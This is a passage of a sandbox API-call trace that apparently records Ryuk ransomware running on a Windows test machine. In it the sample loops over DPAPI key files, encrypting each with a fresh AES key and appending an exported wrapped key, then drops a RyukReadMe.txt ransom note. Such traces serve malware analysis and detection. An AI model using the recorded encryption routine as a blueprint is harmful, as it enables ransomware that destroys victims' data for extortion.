lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=468) returned 1 [0150.074] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=468) returned 1 [0150.074] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xb2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.074] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0150.075] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.075] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0150.075] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.075] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.075] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1d4, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x1d4, lpOverlapped=0x0) returned 1 [0150.075] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0150.075] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1d4, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1e0) returned 1 [0150.075] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.075] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1e0, lpOverlapped=0x0) returned 1 [0150.075] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0150.075] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0150.075] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0150.075] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0150.075] CloseHandle (hObject=0x198) returned 1 [0150.092] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.096] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.096] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.096] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0150.096] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.096] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c", dwFileAttributes=0x80) returned 1 [0150.097] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0150.097] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=468) returned 1 [0150.097] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=468) returned 1 [0150.097] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xb2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.097] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0150.097] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.097] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0150.098] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.098] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.098] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1d4, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x1d4, lpOverlapped=0x0) returned 1 [0150.098] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0150.098] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1d4, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1e0) returned 1 [0150.098] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.098] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1e0, lpOverlapped=0x0) returned 1 [0150.098] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0150.098] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0150.098] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0150.098] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0150.098] CloseHandle (hObject=0x198) returned 1 [0150.118] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.122] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.122] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.122] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0150.122] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.122] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d", dwFileAttributes=0x80) returned 1 [0150.122] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0150.123] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=468) returned 1 [0150.123] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=468) returned 1 [0150.123] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xb2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.123] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0150.123] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.123] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0150.123] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.124] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.124] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1d4, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x1d4, lpOverlapped=0x0) returned 1 [0150.124] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0150.124] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1d4, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1e0) returned 1 [0150.124] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.124] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1e0, lpOverlapped=0x0) returned 1 [0150.124] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0150.124] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0150.124] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0150.124] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0150.124] CloseHandle (hObject=0x198) returned 1 [0150.150] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.154] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.154] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.154] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0150.155] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.155] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\e92d768e-c451-4b80-abf0-212ebc99b93f", dwFileAttributes=0x80) returned 1 [0150.155] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\e92d768e-c451-4b80-abf0-212ebc99b93f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\e92d768e-c451-4b80-abf0-212ebc99b93f"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0150.155] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=468) returned 1 [0150.155] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=468) returned 1 [0150.155] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xb2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.155] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0150.156] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.156] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0150.156] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.156] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.156] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1d4, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x1d4, lpOverlapped=0x0) returned 1 [0150.156] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0150.156] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1d4, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1e0) returned 1 [0150.156] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.156] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1e0, lpOverlapped=0x0) returned 1 [0150.157] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0150.157] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0150.157] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0150.157] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0150.157] CloseHandle (hObject=0x198) returned 1 [0150.173] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.178] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.178] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.178] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0150.178] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.178] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d", dwFileAttributes=0x80) returned 1 [0150.179] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0150.179] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=468) returned 1 [0150.179] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=468) returned 1 [0150.179] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xb2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.179] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0150.180] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.180] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0150.180] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.180] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.180] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1d4, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x1d4, lpOverlapped=0x0) returned 1 [0150.180] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0150.180] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1d4, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1e0) returned 1 [0150.180] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.180] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1e0, lpOverlapped=0x0) returned 1 [0150.180] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0150.181] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0150.181] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0150.181] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0150.181] CloseHandle (hObject=0x198) returned 1 [0150.197] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.201] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.201] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.201] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0150.201] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.202] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred", dwFileAttributes=0x80) returned 1 [0150.202] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\preferred"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0150.202] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=24) returned 1 [0150.202] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=24) returned 1 [0150.202] CloseHandle (hObject=0x198) returned 1 [0150.202] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.202] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0150.202] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0150.203] SetLastError (dwErrCode=0x0) [0150.203] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0150.203] GetLastError () returned 0x0 [0150.203] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0150.204] CloseHandle (hObject=0x194) returned 1 [0150.204] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0150.204] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.204] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST", dwFileAttributes=0x80) returned 1 [0150.205] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\synchist"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0150.205] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=76) returned 1 [0150.205] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=76) returned 1 [0150.205] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0150.205] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.205] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.205] ReadFile (in: 